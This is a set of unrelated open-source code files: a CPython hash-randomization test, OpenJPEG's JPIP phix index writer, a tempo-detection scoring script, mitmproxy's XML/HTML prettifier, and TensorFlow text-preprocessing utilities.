def test_hash_randomization(self):
# Verify that -R enables hash randomization:
self.verify_valid_flag('-R')
hashes = []
for i in range(2):
code = 'print(hash("spam"))'
rc, out, err = assert_python_ok('-R', '-c', code)
self.assertEqual(rc, 0)
hashes.append(out)
self.assertNotEqual(hashes[0], hashes[1])
# Verify that sys.flags contains hash_randomization
code = 'import sys; print("random is", sys.flags.hash_randomization)'
rc, out, err = assert_python_ok('-R', '-c', code)
self.assertEqual(rc, 0)
self.assertIn(b'random is 1', out)
def test_main():
    # Run the whole suite, then reap any interpreter subprocesses the
    # tests may have left behind.
    test.support.run_unittest(CmdLineTest)
    test.support.reap_children()
if __name__ == "__main__":
    test_main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* $Id: phix_manager.c 897 2011-08-28 21:43:57Z Kaori.Hagihara@gmail.com $
*
* Copyright (c) 2002-2014, Universite catholique de Louvain (UCL), Belgium
* Copyright (c) 2002-2014, Professor Benoit Macq
* Copyright (c) 2003-2004, Yannick Verschueren
* Copyright (c) 2010-2011, Kaori Hagihara
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS `AS IS'
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
/*! \file
* \brief Modification of jpip.c from 2KAN indexer
*/
#include "opj_includes.h"
/*
* Write faix box of phix
*
* @param[in] coff offset of j2k codestream
* @param[in] compno component number
* @param[in] cstr_info codestream information
* @param[in] EPHused true if if EPH option used
* @param[in] j2klen length of j2k codestream
* @param[in] cio file output handle
* @return length of faix box
*/
/*
 * Write the phix box (packet-header index) of a JPIP index.
 *
 * The box is written in two passes: pass 0 measures the length of each
 * per-component faix sub-box so that the manifest written by opj_write_manf()
 * in pass 1 carries correct lengths; pass 1 rewinds to the box start and
 * writes the final data.
 *
 * @param[in] coff      offset of j2k codestream
 * @param[in] cstr_info codestream information
 * @param[in] EPHused   true if the EPH option was used
 * @param[in] j2klen    length of j2k codestream
 * @param[in] cio       file output handle
 * @param[in] p_manager event manager
 * @return length of the phix box (0 on allocation failure)
 */
int opj_write_phix(int coff, opj_codestream_info_t cstr_info, OPJ_BOOL EPHused,
                   int j2klen, opj_stream_private_t *cio,
                   opj_event_mgr_t * p_manager)
{
    OPJ_BYTE l_data_header [8];
    OPJ_UINT32 len, compno, i;
    opj_jp2_box_t *box;
    OPJ_OFF_T lenp = 0;
    box = (opj_jp2_box_t *)opj_calloc((size_t)cstr_info.numcomps,
                                      sizeof(opj_jp2_box_t));
    if (box == NULL) {
        return 0;
    }
    for (i = 0; i < 2; i++) {
        if (i) {
            /* Second pass: rewind to the box start recorded in pass 0. */
            opj_stream_seek(cio, lenp, p_manager);
        }
        lenp = opj_stream_tell(cio);
        opj_stream_skip(cio, 4, p_manager); /* L [at the end] */
        opj_write_bytes(l_data_header, JPIP_PHIX, 4); /* PHIX */
        opj_stream_write_data(cio, l_data_header, 4, p_manager);
        opj_write_manf((int)i, cstr_info.numcomps, box, cio, p_manager);
        for (compno = 0; compno < (OPJ_UINT32)cstr_info.numcomps; compno++) {
            box[compno].length = (OPJ_UINT32)opj_write_phixfaix(coff, (int)compno,
                                 cstr_info, EPHused, j2klen, cio, p_manager);
            box[compno].type = JPIP_FAIX;
        }
        len = (OPJ_UINT32)(opj_stream_tell(cio) - lenp);
        /* BUGFIX: seek back to the start of this box (lenp) before patching
         * the L field; the previous code seeked to absolute offset 4, which
         * is only correct when the box happens to start at the beginning of
         * the file. This matches opj_write_phixfaix() below. */
        opj_stream_seek(cio, lenp, p_manager);
        opj_write_bytes(l_data_header, len, 4); /* L */
        opj_stream_write_data(cio, l_data_header, 4, p_manager);
        opj_stream_seek(cio, lenp + len, p_manager);
    }
    opj_free(box);
    return (int)len;
}
/*
 * Write one per-component faix (fragment array index) sub-box describing the
 * position and length of every packet header of component `compno`, for all
 * tiles, in the order dictated by the codestream's progression order.
 *
 * @param[in] coff      offset of j2k codestream
 * @param[in] compno    component number
 * @param[in] cstr_info codestream information
 * @param[in] EPHused   true if EPH option used (currently unused here)
 * @param[in] j2klen    length of j2k codestream; selects 4- vs 8-byte fields
 * @param[in] cio       file output handle
 * @param[in] p_manager event manager
 * @return length of the faix box
 */
int opj_write_phixfaix(int coff, int compno, opj_codestream_info_t cstr_info,
                       OPJ_BOOL EPHused, int j2klen, opj_stream_private_t *cio,
                       opj_event_mgr_t * p_manager)
{
    OPJ_UINT32 tileno, version, i, nmax, size_of_coding; /* 4 or 8 */
    opj_tile_info_t *tile_Idx;
    opj_packet_info_t packet;
    int resno, precno, layno;
    OPJ_UINT32 num_packet;
    int numOfres, numOfprec, numOflayers;
    OPJ_BYTE l_data_header [8];
    OPJ_OFF_T lenp;
    OPJ_UINT32 len;
    packet.end_ph_pos = packet.start_pos = -1;
    (void)EPHused; /* unused ? */
    /* Use 8-byte offsets (version 1) when the codestream may exceed 2^32. */
    if (j2klen > pow(2, 32)) {
        size_of_coding = 8;
        version = 1;
    } else {
        size_of_coding = 4;
        version = 0;
    }
    lenp = opj_stream_tell(cio);
    opj_stream_skip(cio, 4, p_manager); /* L [at the end] */
    opj_write_bytes(l_data_header, JPIP_FAIX, 4); /* FAIX */
    opj_stream_write_data(cio, l_data_header, 4, p_manager);
    opj_write_bytes(l_data_header, version, 1); /* Version 0 = 4 bytes */
    opj_stream_write_data(cio, l_data_header, 1, p_manager);
    /* NMAX = max number of packets per tile, computed from tile 0's
     * precinct grid at each resolution times the number of layers.
     * NOTE(review): assumes tile 0 is representative of all tiles. */
    nmax = 0;
    for (i = 0; i <= (OPJ_UINT32)cstr_info.numdecompos[compno]; i++) {
        nmax += (OPJ_UINT32)(cstr_info.tile[0].ph[i] * cstr_info.tile[0].pw[i] *
                             cstr_info.numlayers);
    }
    opj_write_bytes(l_data_header, nmax, size_of_coding); /* NMAX */
    opj_stream_write_data(cio, l_data_header, size_of_coding, p_manager);
    opj_write_bytes(l_data_header, (OPJ_UINT32)(cstr_info.tw * cstr_info.th),
                    size_of_coding); /* M */
    opj_stream_write_data(cio, l_data_header, size_of_coding, p_manager);
    for (tileno = 0; tileno < (OPJ_UINT32)(cstr_info.tw * cstr_info.th); tileno++) {
        tile_Idx = &cstr_info.tile[ tileno];
        num_packet = 0;
        numOfres = cstr_info.numdecompos[compno] + 1;
        for (resno = 0; resno < numOfres ; resno++) {
            numOfprec = tile_Idx->pw[resno] * tile_Idx->ph[resno];
            for (precno = 0; precno < numOfprec; precno++) {
                numOflayers = cstr_info.numlayers;
                for (layno = 0; layno < numOflayers; layno++) {
                    /* The linear packet index depends on the progression
                     * order used when the codestream was written. */
                    switch (cstr_info.prog) {
                    case OPJ_LRCP:
                        packet = tile_Idx->packet[((layno * numOfres + resno) * cstr_info.numcomps +
                                                                               compno) * numOfprec + precno];
                        break;
                    case OPJ_RLCP:
                        packet = tile_Idx->packet[((resno * numOflayers + layno) * cstr_info.numcomps +
                                                                                   compno) * numOfprec + precno];
                        break;
                    case OPJ_RPCL:
                        packet = tile_Idx->packet[((resno * numOfprec + precno) * cstr_info.numcomps +
                                                                                  compno) * numOflayers + layno];
                        break;
                    case OPJ_PCRL:
                        packet = tile_Idx->packet[((precno * cstr_info.numcomps + compno) * numOfres +
                                                                                           resno) * numOflayers + layno];
                        break;
                    case OPJ_CPRL:
                        packet = tile_Idx->packet[((compno * numOfprec + precno) * numOfres + resno) *
                                                                                               numOflayers + layno];
                        break;
                    default:
                        fprintf(stderr, "failed to ppix indexing\n");
                    }
                    /* Emit (start position, length) of this packet header. */
                    opj_write_bytes(l_data_header, (OPJ_UINT32)(packet.start_pos - coff),
                                    size_of_coding); /* start position */
                    opj_stream_write_data(cio, l_data_header, size_of_coding, p_manager);
                    opj_write_bytes(l_data_header,
                                    (OPJ_UINT32)(packet.end_ph_pos - packet.start_pos + 1),
                                    size_of_coding); /* length */
                    opj_stream_write_data(cio, l_data_header, size_of_coding, p_manager);
                    num_packet++;
                }
            }
        }
        /* PADDING: pad every tile's entry list out to NMAX with zeros. */
        while (num_packet < nmax) {
            opj_write_bytes(l_data_header, 0,
                            size_of_coding); /* start position */
            opj_stream_write_data(cio, l_data_header, size_of_coding, p_manager);
            opj_write_bytes(l_data_header, 0,
                            size_of_coding); /* length */
            opj_stream_write_data(cio, l_data_header, size_of_coding, p_manager);
            num_packet++;
        }
    }
    /* Patch the 4-byte L (length) field at the start of the box. */
    len = (OPJ_UINT32)(opj_stream_tell(cio) - lenp);
    opj_stream_seek(cio, lenp, p_manager);
    opj_write_bytes(l_data_header, len, 4); /* L */
    opj_stream_write_data(cio, l_data_header, 4, p_manager);
    opj_stream_seek(cio, lenp + len, p_manager);
    return (int)len;
}
|
c
|
github
|
https://github.com/opencv/opencv
|
3rdparty/openjpeg/openjp2/phix_manager.c
|
#!/usr/bin/env python
import sys
import mar_collection
def exact_accuracy(bpm_detected, bpm_ground):
    """Return True when the detected tempo is within 4% of the ground truth."""
    tolerance = 0.04
    return abs(bpm_detected - bpm_ground) <= tolerance * bpm_ground
def major_extended_harmonic_accuracy(bpm_detected, bpm_ground):
    """Return True when the detected tempo matches any integer multiple of
    the ground-truth tempo (up to ~1000 BPM), within a 4% tolerance of the
    ground truth.
    """
    tolerance = 0.04
    margin = tolerance * bpm_ground
    multiple = 1
    candidate = bpm_ground * multiple
    # Note: the loop condition checks the candidate from the previous
    # iteration, so one multiple at or just past 1000 is still examined.
    while candidate < 1000:
        candidate = bpm_ground * multiple
        if abs(bpm_detected - candidate) <= margin:
            return True
        multiple += 1
    return False
def extended_harmonic_accuracy(bpm_detected, bpm_ground):
    """Return True when the detected tempo, scaled by 1x/2x/3x or their
    reciprocals, lands within 4% of the ground-truth tempo.
    """
    tolerance = 0.04
    margin = tolerance * bpm_ground
    for factor in [1, 2, 3]:
        scaled_up = factor * bpm_detected
        scaled_down = bpm_detected / float(factor)
        if abs(scaled_up - bpm_ground) <= margin:
            return True
        if abs(scaled_down - bpm_ground) <= margin:
            return True
    return False
def process_mfs(ground_mf, detected_mf, limit=None):
    """Score a tempo-detection run against ground truth.

    Args:
      ground_mf: path to the ground-truth .mf collection (filename -> BPM).
      detected_mf: path to the detected .mf collection; each entry's value is
        a comma-separated string of candidate BPMs.
      limit: None/0 keeps special behavior -- 0 scores only the first
        candidate with exact accuracy; None uses all candidates; any other
        integer truncates the candidate list before scoring with
        extended-harmonic accuracy.

    Returns:
      Accuracy in percent over all entries of the detected collection.
    """
    # load ground truth
    ground_coll = mar_collection.MarCollection(ground_mf)
    ground_bpms = {}
    for dat in ground_coll.data:
        filename = dat[0]
        bpm_ground = float(dat[1])
        ground_bpms[filename] = bpm_ground
    user_coll = mar_collection.MarCollection(detected_mf)
    good = 0
    i = 0
    for dat in user_coll.data:
        filename = dat[0]
        cand_bpms = dat[1]
        bpm_ground = ground_bpms[filename]
        # BUGFIX: parse the candidate string unconditionally. Previously only
        # strings containing "," were split, so a single-candidate entry
        # stayed a raw string and was iterated character by character.
        if isinstance(cand_bpms, str):
            cand_bpms = [float(a) for a in cand_bpms.split(',')]
        correct = False
        # BUGFIX: use "!=" instead of "is not" -- identity comparison with an
        # int literal is implementation-dependent.
        if limit is not None and limit != 0:
            cand_bpms = cand_bpms[:limit]
        if limit == 0:
            # limit == 0: strict scoring of the top candidate only.
            for bpm_detected in cand_bpms[:1]:
                corr = exact_accuracy(bpm_detected, bpm_ground)
                if corr:
                    correct = True
            if correct:
                good += 1
            i += 1
        else:
            for bpm_detected in cand_bpms:
                corr = extended_harmonic_accuracy(bpm_detected, bpm_ground)
                if corr:
                    correct = True
            if correct:
                good += 1
            i += 1
    accuracy = 100 * float(good) / len(user_coll.data)
    return accuracy
if __name__ == "__main__":
    # Usage: script.py ground.mf detected.mf
    ground_filename = sys.argv[1]
    user_filename = sys.argv[2]
    # Score the detected collection with candidate-list limits of
    # 0 (exact, top-1), 1, 2, 4 and 8 (extended-harmonic accuracy).
    zero = process_mfs(ground_filename, user_filename, 0)
    one = process_mfs(ground_filename, user_filename, 1)
    two = process_mfs(ground_filename, user_filename, 2)
    four = process_mfs(ground_filename, user_filename, 4)
    eight = process_mfs(ground_filename, user_filename, 8)
    print "%s\t%.1f\t%.1f\t%.1f\t%.1f\t%.1f" % (
        user_filename, zero, one, two, four, eight)
|
unknown
|
codeparrot/codeparrot-clean
| ||
import io
import re
import textwrap
from typing import Iterable, Optional
from mitmproxy.contentviews import base
from mitmproxy.utils import sliding_window
"""
A custom XML/HTML prettifier. Compared to other prettifiers, its main features are:
- Implemented in pure Python.
- Modifies whitespace only.
- Works with any input.
- Lazy evaluation.
The implementation is split into two main parts: tokenization and formatting of tokens.
"""
# http://www.xml.com/pub/a/2001/07/25/namingparts.html - this is close enough for what we do.
REGEX_TAG = re.compile(r"[a-zA-Z0-9._:\-]+(?!=)")
# https://www.w3.org/TR/html5/syntax.html#void-elements
HTML_VOID_ELEMENTS = {
"area", "base", "br", "col", "embed", "hr", "img", "input", "keygen", "link", "meta", "param",
"source", "track", "wbr"
}
NO_INDENT_TAGS = {"xml", "doctype", "html"}
INDENT = 2
class Token:
    """Base class for lexer tokens; stores the raw source text in `data`."""
    def __init__(self, data):
        self.data = data
    def __repr__(self):
        return "{}({})".format(type(self).__name__, self.data)
class Text(Token):
    """A run of character data between two tags."""
    @property
    def text(self):
        """The raw data with surrounding whitespace removed."""
        return self.data.strip()
class Tag(Token):
    """A markup token: an element tag, comment, CDATA section, or doctype."""
    @property
    def tag(self):
        """The lowercased tag name, or "<empty>" when none can be found."""
        t = REGEX_TAG.search(self.data)
        if t is not None:
            return t.group(0).lower()
        return "<empty>"
    @property
    def is_comment(self) -> bool:
        return self.data.startswith("<!--")
    @property
    def is_cdata(self) -> bool:
        return self.data.startswith("<![CDATA[")
    @property
    def is_closing(self):
        return self.data.startswith("</")
    @property
    def is_self_closing(self):
        # Comments, CDATA, explicit "/>" endings, and HTML void elements
        # never take a separate closing tag.
        return self.is_comment or self.is_cdata or self.data.endswith(
            "/>") or self.tag in HTML_VOID_ELEMENTS
    @property
    def is_opening(self):
        return not self.is_closing and not self.is_self_closing
    @property
    def done(self):
        """True once the token's data extends to its proper terminator."""
        if self.is_comment:
            return self.data.endswith("-->")
        elif self.is_cdata:
            return self.data.endswith("]]>")
        else:
            # This fails for attributes that contain an unescaped ">"
            return self.data.endswith(">")
def tokenize(data: str) -> Iterable[Token]:
    """Lazily split *data* into alternating Text and Tag tokens.

    Whitespace-only text runs are dropped; a trailing partial token (e.g. an
    unterminated tag at end of input) is still yielded.
    """
    token: Token = Text("")
    i = 0  # current scan position in `data`, advanced by readuntil()
    def readuntil(char, start, include=1):
        # Read from position i up to (and, if include=1, including) the next
        # occurrence of `char` at or after `start`; advance i past it.
        nonlocal i
        end = data.find(char, start)
        if end == -1:
            end = len(data)
        ret = data[i:end + include]
        i = end + include
        return ret
    while i < len(data):
        if isinstance(token, Text):
            # Accumulate text up to (not including) the next "<".
            token.data = readuntil("<", i, 0)
            if token.text:
                yield token
            token = Tag("")
        elif isinstance(token, Tag):
            # Keep appending ">"-terminated chunks until the tag is complete
            # (comments/CDATA may contain ">" and need their own terminators).
            token.data += readuntil(">", i, 1)
            if token.done:
                yield token
                token = Text("")
    # Flush a trailing incomplete token, if any.
    if token.data.strip():
        yield token
def indent_text(data: str, prefix: str) -> str:
    """Strip `data`'s own indentation, then re-indent it under `prefix`.

    The first line is padded before dedenting so that multi-line values like
    "<li>This is\n    example text\n</li>" dedent consistently.
    """
    padded = " " * 32 + data
    normalised = textwrap.dedent(padded).strip()
    return textwrap.indent(normalised, prefix[:32])
def is_inline_text(a: Optional[Token], b: Optional[Token], c: Optional[Token]) -> bool:
    """True for the single-line pattern <tag>text</tag> (a=open, b=text, c=close)."""
    return (
        isinstance(a, Tag)
        and isinstance(b, Text)
        and isinstance(c, Tag)
        and a.is_opening
        and "\n" not in b.data
        and c.is_closing
        and a.tag == c.tag
    )
def is_inline(prev2: Optional[Token], prev1: Optional[Token], t: Optional[Token], next1: Optional[Token], next2: Optional[Token]) -> bool:
    """Decide whether token `t` should be rendered on the same line as its
    neighbours (short <tag>text</tag> runs and empty <div></div> pairs)."""
    if isinstance(t, Text):
        return is_inline_text(prev1, t, next1)
    if isinstance(t, Tag):
        if is_inline_text(prev2, prev1, t) or is_inline_text(t, next1, next2):
            return True
        # <div></div>: `t` is the start tag...
        opens_empty_pair = (
            isinstance(next1, Tag) and t.is_opening and next1.is_closing and t.tag == next1.tag
        )
        # ...or `t` is the end tag.
        closes_empty_pair = (
            isinstance(prev1, Tag) and prev1.is_opening and t.is_closing and prev1.tag == t.tag
        )
        return opens_empty_pair or closes_empty_pair
    return False
class ElementStack:
    """
    Keep track of how deeply nested our document is.
    """
    def __init__(self):
        self.open_tags = []
        self.indent = ""
    def push_tag(self, tag: str):
        """Record an opened tag and deepen the indent (capped at 16 levels)."""
        if len(self.open_tags) > 16:
            # Guard against pathological nesting: stop tracking further tags.
            return
        self.open_tags.append(tag)
        if tag not in NO_INDENT_TAGS:
            self.indent += " " * INDENT
    def pop_tag(self, tag: str):
        """Unwind the stack down to (and including) `tag`, shrinking the indent."""
        if tag not in self.open_tags:
            # this closing tag has no start tag. let's keep indentation as-is.
            return
        removed = 0
        while True:
            top = self.open_tags.pop()
            if top not in NO_INDENT_TAGS:
                removed += INDENT
            if top == tag:
                break
        self.indent = self.indent[:-removed]
def format_xml(tokens: Iterable[Token]) -> str:
    """Render a token stream as pretty-printed XML/HTML text.

    Walks the tokens with a two-before/two-after sliding window so that
    is_inline() can see enough context, tracking indentation depth with an
    ElementStack.
    """
    out = io.StringIO()
    context = ElementStack()
    for prev2, prev1, token, next1, next2 in sliding_window.window(tokens, 2, 2):
        if isinstance(token, Tag):
            if token.is_opening:
                out.write(indent_text(token.data, context.indent))
                # Inline openings (e.g. <b>text</b>) get no line break here.
                if not is_inline(prev2, prev1, token, next1, next2):
                    out.write("\n")
                context.push_tag(token.tag)
            elif token.is_closing:
                # Dedent before emitting the closing tag.
                context.pop_tag(token.tag)
                if is_inline(prev2, prev1, token, next1, next2):
                    out.write(token.data)
                else:
                    out.write(indent_text(token.data, context.indent))
                out.write("\n")
            else:  # self-closing
                out.write(indent_text(token.data, context.indent))
                out.write("\n")
        elif isinstance(token, Text):
            if is_inline(prev2, prev1, token, next1, next2):
                out.write(token.text)
            else:
                out.write(indent_text(token.data, context.indent))
                out.write("\n")
        else:  # pragma: no cover
            raise RuntimeError()
    return out.getvalue()
class ViewXmlHtml(base.View):
    """mitmproxy contentview that pretty-prints XML and HTML bodies."""
    name = "XML/HTML"
    content_types = ["text/xml", "text/html"]
    def __call__(self, data, **metadata):
        # TODO:
        # We should really have the message text as str here,
        # not the message content as bytes.
        # https://github.com/mitmproxy/mitmproxy/issues/1662#issuecomment-266192578
        data = data.decode("utf8", "xmlcharrefreplace")
        tokens = tokenize(data)
        # TODO:
        # Performance: Don't render the whole document right away.
        # Let's wait with this until we have a sequence-like interface,
        # this thing is reasonably fast right now anyway.
        pretty = base.format_text(format_xml(tokens))
        # Crude heuristic: any occurrence of "html" in the body selects the
        # HTML label; otherwise report XML.
        if "html" in data.lower():
            t = "HTML"
        else:
            t = "XML"
        return t, pretty
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for generating/preprocessing data for adversarial text models."""
import operator
import os
import random
import re
# Dependency imports
import tensorflow as tf
EOS_TOKEN = '</s>'
# Data filenames
# Sequence Autoencoder
ALL_SA = 'all_sa.tfrecords'
TRAIN_SA = 'train_sa.tfrecords'
TEST_SA = 'test_sa.tfrecords'
# Language Model
ALL_LM = 'all_lm.tfrecords'
TRAIN_LM = 'train_lm.tfrecords'
TEST_LM = 'test_lm.tfrecords'
# Classification
TRAIN_CLASS = 'train_classification.tfrecords'
TEST_CLASS = 'test_classification.tfrecords'
VALID_CLASS = 'validate_classification.tfrecords'
# LM with bidirectional LSTM
TRAIN_REV_LM = 'train_reverse_lm.tfrecords'
TEST_REV_LM = 'test_reverse_lm.tfrecords'
# Classification with bidirectional LSTM
TRAIN_BD_CLASS = 'train_bidir_classification.tfrecords'
TEST_BD_CLASS = 'test_bidir_classification.tfrecords'
VALID_BD_CLASS = 'validate_bidir_classification.tfrecords'
class ShufflingTFRecordWriter(object):
  """Thin wrapper around TFRecordWriter that shuffles records."""
  def __init__(self, path):
    # Records are buffered in memory and only written (shuffled) on close().
    self._path = path
    self._records = []
    self._closed = False
  def write(self, record):
    """Buffer a serialized record for later shuffled writing."""
    assert not self._closed
    self._records.append(record)
  def close(self):
    """Shuffle all buffered records and flush them to the target path."""
    assert not self._closed
    random.shuffle(self._records)
    with tf.python_io.TFRecordWriter(self._path) as f:
      for record in self._records:
        f.write(record)
    self._closed = True
  def __enter__(self):
    return self
  def __exit__(self, unused_type, unused_value, unused_traceback):
    self.close()
class Timestep(object):
  """Represents a single timestep in a SequenceWrapper.

  Wraps three proto Feature objects (token, label, weight) and exposes
  typed accessors/mutators over their value lists.
  """
  def __init__(self, token, label, weight, multivalent_tokens=False):
    """Constructs Timestep from empty Features."""
    self._token = token
    self._label = label
    self._weight = weight
    # When True, a timestep may hold several token ids (e.g. forward and
    # reverse tokens of a bidirectional sequence) and `token` is disallowed.
    self._multivalent_tokens = multivalent_tokens
    self._fill_with_defaults()
  @property
  def token(self):
    if self._multivalent_tokens:
      raise TypeError('Timestep may contain multiple values; use `tokens`')
    return self._token.int64_list.value[0]
  @property
  def tokens(self):
    return self._token.int64_list.value
  @property
  def label(self):
    return self._label.int64_list.value[0]
  @property
  def weight(self):
    return self._weight.float_list.value[0]
  def set_token(self, token):
    """Overwrite the single token id; returns self for chaining."""
    if self._multivalent_tokens:
      raise TypeError('Timestep may contain multiple values; use `add_token`')
    self._token.int64_list.value[0] = token
    return self
  def add_token(self, token):
    """Append a token id (multivalent mode); returns self for chaining."""
    self._token.int64_list.value.append(token)
    return self
  def set_label(self, label):
    self._label.int64_list.value[0] = label
    return self
  def set_weight(self, weight):
    self._weight.float_list.value[0] = weight
    return self
  def copy_from(self, timestep):
    """Copy token, label and weight from another (univalent) timestep."""
    self.set_token(timestep.token).set_label(timestep.label).set_weight(
        timestep.weight)
    return self
  def _fill_with_defaults(self):
    # Pre-populate each value list so the index-0 setters above are valid.
    if not self._multivalent_tokens:
      self._token.int64_list.value.append(0)
    self._label.int64_list.value.append(0)
    self._weight.float_list.value.append(0.0)
class SequenceWrapper(object):
  """Wrapper around tf.SequenceExample.

  Maintains three parallel feature lists (token ids, labels, weights) and a
  Python-side list of Timestep views over them.
  """
  # Feature-list keys inside the underlying SequenceExample proto.
  F_TOKEN_ID = 'token_id'
  F_LABEL = 'label'
  F_WEIGHT = 'weight'
  def __init__(self, multivalent_tokens=False):
    self._seq = tf.train.SequenceExample()
    self._flist = self._seq.feature_lists.feature_list
    self._timesteps = []
    self._multivalent_tokens = multivalent_tokens
  @property
  def seq(self):
    return self._seq
  @property
  def multivalent_tokens(self):
    return self._multivalent_tokens
  @property
  def _tokens(self):
    return self._flist[SequenceWrapper.F_TOKEN_ID].feature
  @property
  def _labels(self):
    return self._flist[SequenceWrapper.F_LABEL].feature
  @property
  def _weights(self):
    return self._flist[SequenceWrapper.F_WEIGHT].feature
  def add_timestep(self):
    """Append a new (default-initialized) Timestep and return it."""
    timestep = Timestep(
        self._tokens.add(),
        self._labels.add(),
        self._weights.add(),
        multivalent_tokens=self._multivalent_tokens)
    self._timesteps.append(timestep)
    return timestep
  def __iter__(self):
    for timestep in self._timesteps:
      yield timestep
  def __len__(self):
    return len(self._timesteps)
  def __getitem__(self, idx):
    return self._timesteps[idx]
def build_reverse_sequence(seq):
  """Builds a sequence that is the reverse of the input sequence.

  Only the first len(seq)-1 timesteps are reversed; the final timestep
  (presumably the </s> EOS marker -- confirm against callers) stays last.
  """
  reverse_seq = SequenceWrapper()
  # Copy all but last timestep
  for timestep in reversed(seq[:-1]):
    reverse_seq.add_timestep().copy_from(timestep)
  # Copy final timestep
  reverse_seq.add_timestep().copy_from(seq[-1])
  return reverse_seq
def build_bidirectional_seq(seq, rev_seq):
  """Zips forward and reverse sequences into one multivalent sequence.

  Each output timestep carries two token ids: the forward token followed by
  the reverse token at the same position.
  """
  bidir_seq = SequenceWrapper(multivalent_tokens=True)
  for forward_ts, reverse_ts in zip(seq, rev_seq):
    bidir_seq.add_timestep().add_token(forward_ts.token).add_token(
        reverse_ts.token)
  return bidir_seq
def build_lm_sequence(seq):
  """Builds language model sequence from input sequence.
  Args:
    seq: SequenceWrapper.
  Returns:
    SequenceWrapper with `seq` tokens copied over to output sequence tokens and
    labels (offset by 1, i.e. predict next token) with weights set to 1.0,
    except for <eos> token.
  """
  lm_seq = SequenceWrapper()
  for i, timestep in enumerate(seq):
    if i == len(seq) - 1:
      # Final timestep: label is the token itself, weight 0 so it does not
      # contribute to the LM loss.
      lm_seq.add_timestep().set_token(timestep.token).set_label(
          seq[i].token).set_weight(0.0)
    else:
      lm_seq.add_timestep().set_token(timestep.token).set_label(
          seq[i + 1].token).set_weight(1.0)
  return lm_seq
def build_seq_ae_sequence(seq):
  """Builds seq_ae sequence from input sequence.
  Args:
    seq: SequenceWrapper.
  Returns:
    SequenceWrapper with `seq` inputs copied and concatenated, and with labels
    copied in on the right-hand (i.e. decoder) side with weights set to 1.0.
    The new sequence will have length `len(seq) * 2 - 1`, as the last timestep
    of the encoder section and the first step of the decoder section will
    overlap.
  """
  seq_ae_seq = SequenceWrapper()
  for i in range(len(seq) * 2 - 1):
    ts = seq_ae_seq.add_timestep()
    if i < len(seq) - 1:
      # Encoder
      ts.set_token(seq[i].token)
    elif i == len(seq) - 1:
      # Transition step
      ts.set_token(seq[i].token)
      ts.set_label(seq[0].token)
      ts.set_weight(1.0)
    else:
      # Decoder
      ts.set_token(seq[i % len(seq)].token)
      ts.set_label(seq[(i + 1) % len(seq)].token)
      ts.set_weight(1.0)
  return seq_ae_seq
def build_labeled_sequence(seq, class_label, label_gain=False):
  """Builds a classification sequence from an input sequence.

  Args:
    seq: SequenceWrapper.
    class_label: bool.
    label_gain: bool. If True, every timestep is labeled and its weight ramps
      linearly from 0 to 1 across the sequence.

  Returns:
    SequenceWrapper with `seq` copied in; the final timestep always carries
    `class_label` at weight 1.0.
  """
  label_seq = SequenceWrapper(multivalent_tokens=seq.multivalent_tokens)
  seq_len = len(seq)
  final_timestep = None
  for i, timestep in enumerate(seq):
    out_ts = label_seq.add_timestep()
    # Copy tokens, preserving multivalence.
    if seq.multivalent_tokens:
      for token in timestep.tokens:
        out_ts.add_token(token)
    else:
      out_ts.set_token(timestep.token)
    if label_gain:
      ramp = 1.0 if seq_len < 2 else float(i) / (seq_len - 1)
      out_ts.set_label(int(class_label))
      out_ts.set_weight(ramp)
    if i == seq_len - 1:
      final_timestep = out_ts
  # The final timestep is always fully labeled and fully weighted.
  final_timestep.set_label(int(class_label)).set_weight(1.0)
  return label_seq
def split_by_punct(segment):
  """Splits `segment` on runs of non-word characters, dropping empty pieces."""
  pieces = re.split(r'\W+', segment)
  return [piece for piece in pieces if piece and not piece.isspace()]
def sort_vocab_by_frequency(vocab_freq_map):
  """Sorts vocab_freq_map entries by count, most frequent first.

  Args:
    vocab_freq_map: dict<str term, int count>, vocabulary terms with counts.

  Returns:
    list<tuple<str term, int count>> sorted by count, descending.
  """
  return sorted(
      vocab_freq_map.items(), key=lambda entry: entry[1], reverse=True)
def write_vocab_and_frequency(ordered_vocab_freqs, output_dir):
  """Writes terms to vocab.txt and their counts to vocab_freq.txt, line-aligned."""
  tf.gfile.MakeDirs(output_dir)
  vocab_path = os.path.join(output_dir, 'vocab.txt')
  freq_path = os.path.join(output_dir, 'vocab_freq.txt')
  with open(vocab_path, 'w') as vocab_f, open(freq_path, 'w') as freq_f:
    for word, freq in ordered_vocab_freqs:
      vocab_f.write('{}\n'.format(word))
      freq_f.write('{}\n'.format(freq))
|
unknown
|
codeparrot/codeparrot-clean
| ||
# coding=utf-8
# Copyright 2021 The Tensor2Robot Authors.
#
